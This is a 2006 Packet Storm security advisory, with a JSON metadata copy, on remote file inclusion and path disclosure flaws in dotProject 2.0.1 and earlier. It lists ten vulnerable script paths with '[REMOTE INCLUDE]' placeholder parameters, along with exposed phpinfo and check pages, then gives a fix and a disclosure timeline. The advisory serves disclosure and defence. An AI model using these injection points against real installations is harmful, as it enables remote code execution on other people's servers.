ID PACKETSTORM:43861 Type packetstorm Reporter Robin Verton Modified 2006-02-14T00:00:00
Description
`dotproject <= 2.0.1 remote code execution
======================================
Software: dotProject <= 2.0.1
Severity: Arbitrary code execution, Path/Information Disclosure
Risk: High
Author: Robin Verton <r.verton@gmail.com>
Date: Feb. 14 2006
Vendor: dotproject.net [contacted]
Description:
dotProject is a volunteer supported Project Management application.
Details:
The 'protection.php' script does not properly validate user-supplied input in the 'siteurl' parameter.
Some user-supplied input is not checked correctly so an attacker can include a remote php file and
execute arbitrary phpcode or arbitrary system command via eval().
Because there are over 10 Bugs I only post the vulnerable files + parameters which are not checked.
To exploit these vulnerables register_globals have to be set ON (default).
1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE]
2) /includes/db_connect.php?baseDir=[REMOTE INCLUDE]
3) /includes/session.php?baseDir=[REMOTE INCLUDE]
4) /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]
5) /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]
6) /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]
7) /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]
8) /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]
9) /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]
10) /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]
There are also some path discolsure bugs:
Nearly ALL files in /db/ give out some nice php-errors by accessing them directly with the parameter
baseDir=foobar.
Then, if the /doc/ directory is not deleted (default) you can access to two varoius files which
disclose you some system informations:
1) /docs/phpinfo.php - A phpinfo() file.
2) /docs/check.php - Some more informations about the installed dotProject.
Solution:
Turn register_globals OFF, delete the /docs/ dir and cover /db/ dir with an htaccess.
Timeline:
24.01.2006 - Bugs found
26.01.2006 - Vendor Contacted
14.02.2006 - Publishing
Credits:
Credits go to Robin Verton (r.verton [at] gmail [dot] com)
`
{"id": "PACKETSTORM:43861", "type": "packetstorm", "bulletinFamily": "exploit", "title": "dotProject-2.0.1.txt", "description": "", "published": "2006-02-14T00:00:00", "modified": "2006-02-14T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/43861/dotProject-2.0.1.txt.html", "reporter": "Robin Verton", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:29:28", "viewCount": 2, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:29:28", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:28", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/43861/dotProject-2.0.1.txt", "sourceData": "`dotproject <= 2.0.1 remote code execution \n====================================== \n \nSoftware: dotProject <= 2.0.1 \nSeverity: Arbitrary code execution, Path/Information Disclosure \nRisk: High \nAuthor: Robin Verton <r.verton@gmail.com> \nDate: Feb. 14 2006 \nVendor: dotproject.net [contacted] \n \nDescription: \ndotProject is a volunteer supported Project Management application. \n \nDetails: \nThe 'protection.php' script does not properly validate user-supplied input in the 'siteurl' parameter. \nSome user-supplied input is not checked correctly so an attacker can include a remote php file and \nexecute arbitrary phpcode or arbitrary system command via eval(). \n \nBecause there are over 10 Bugs I only post the vulnerable files + parameters which are not checked. \nTo exploit these vulnerables register_globals have to be set ON (default). \n \n1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE] \n \n2) /includes/db_connect.php?baseDir=[REMOTE INCLUDE] \n \n3) /includes/session.php?baseDir=[REMOTE INCLUDE] \n \n4) /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE] \n \n5) /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE] \n \n6) /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE] \n \n7) /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE] \n \n8) /modules/public/calendar.php?baseDir=[REMOTE INCLUDE] \n \n9) /modules/public/date_format.php?baseDir=[REMOTE INCLUDE] \n \n10) /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE] \n \nThere are also some path discolsure bugs: \n \nNearly ALL files in /db/ give out some nice php-errors by accessing them directly with the parameter \nbaseDir=foobar. \n \nThen, if the /doc/ directory is not deleted (default) you can access to two varoius files which \ndisclose you some system informations: \n \n1) /docs/phpinfo.php - A phpinfo() file. \n \n2) /docs/check.php - Some more informations about the installed dotProject. \n \nSolution: \nTurn register_globals OFF, delete the /docs/ dir and cover /db/ dir with an htaccess. \n \nTimeline: \n24.01.2006 - Bugs found \n26.01.2006 - Vendor Contacted \n14.02.2006 - Publishing \n \nCredits: \nCredits go to Robin Verton (r.verton [at] gmail [dot] com) \n \n`\n"}